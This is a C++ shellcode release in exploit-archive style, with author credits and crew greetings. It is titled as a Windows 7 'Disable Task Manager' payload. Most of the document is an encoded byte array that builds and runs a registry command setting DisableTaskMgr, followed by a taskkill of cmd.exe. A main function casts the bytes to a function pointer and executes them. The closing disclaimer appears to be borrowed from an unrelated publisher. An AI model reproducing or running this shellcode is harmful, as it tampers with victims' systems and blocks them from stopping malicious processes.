/*------------------------------------------------
==[ By Ayrbyte ]======[ Geng Simbe @ TKJ 1 Club ]========================================
Greets To : Adit Groundd SAndd Notte, Agos Wahyo, Aguenkk Rebel Black Sweet,
Ahmad Bagoes, Alvin Putra Marcdyto, Arieb Shezhaniea, Aviep Autiez, Chusnie Mubarok,
Cumigh Gokil On Üç, Dapat Di Hubungi, De Ayiph Ever, Dwi J Andreansyah, Jack PYing,
Khuluq Gomez, Ola Amor Arpaz, Pewe, Q-blueshiierezpector Screamoalltheway Aparatkeparat,
Raden Mas Koko, Rivan Ardiansyah, Rizqi Bogez, Rony C'Penghianat X Ciinta, Sukrex Dreizehn,
Syafi'i, and all Tkj 1 Club Family... ^_^
=========================================================================================
--------------------------------------------------
title : Windows7 Disable Task Manager Shellcode - 326 chars
Author: Ayrbyte
Category: local
Tested on: Windows7 Ultimate
Code : c++
Fb : fb.me/Ayrbyte
------------------------------------------------ */
#include <iostream>
using namespace std;
char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x52\x89\x4A\x04\xB9\x45\x47\x20\x61\x89\x4A\x08\xB9\x64\x64\x20\x48\x89\x4A\x0C\xB9\x4B"
"\x43\x55\x5C\x89\x4A\x10\xB9\x53\x6F\x66\x74\x89\x4A\x14\xB9\x77\x61\x72\x65\x89\x4A\x18\xB9\x5C\x4D\x69\x63\x89\x4A\x1C\xB9\x72"
"\x6F\x73\x6F\x89\x4A\x20\xB9\x66\x74\x5C\x57\x89\x4A\x24\xB9\x69\x6E\x64\x6F\x89\x4A\x28\xB9\x77\x73\x5C\x43\x89\x4A\x2C\xB9\x75"
"\x72\x72\x65\x89\x4A\x30\xB9\x6E\x74\x56\x65\x89\x4A\x34\xB9\x72\x73\x69\x6F\x89\x4A\x38\xB9\x6E\x5C\x50\x6F\x89\x4A\x3C\xB9\x6C"
"\x69\x63\x69\x89\x4A\x40\xB9\x65\x73\x5C\x53\x89\x4A\x44\xB9\x79\x73\x74\x65\x89\x4A\x48\xB9\x6D\x20\x2F\x76\x89\x4A\x4C\xB9\x20"
"\x44\x69\x73\x89\x4A\x50\xB9\x61\x62\x6C\x65\x89\x4A\x54\xB9\x54\x61\x73\x6B\x89\x4A\x58\xB9\x4D\x67\x72\x20\x89\x4A\x5C\xB9\x2F"
"\x74\x20\x52\x89\x4A\x60\xB9\x45\x47\x5F\x44\x89\x4A\x64\xB9\x57\x4F\x52\x44\x89\x4A\x68\xB9\x20\x2F\x64\x20\x89\x4A\x6C\xB9\x31"
"\x20\x2F\x66\x89\x4A\x70\xB9\x20\x26\x20\x74\x89\x4A\x74\xB9\x61\x73\x6B\x6B\x89\x4A\x78\xB9\x69\x6C\x6C\x20\x89\x4A\x7C\xB9\x2F"
"\x69\x6D\x20\x89\x8A\x80\x00\x00\x00\xB9\x63\x6D\x64\x2E\x89\x8A\x84\x00\x00\x00\xB9\x65\x78\x65\x20\x89\x8A\x88\x00\x00\x00\xB9"
"\x40\x77\x11\x11\x2B\xC8\x89\x8A\x8C\x00\x00\x00\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51\x8D\x4E\xBC\x51\x53"
"\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33\xDB"
"\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB8\x11\x11\x11\x11"
"\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";
int main(){printf("Shellcode Length is : %u\n",strlen(code));system("PAUSE");
int (*_13)() = (int(*)())code; _13(); }
/*=================[ Geng Simbe @ TKJ 1 Club ]======*/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information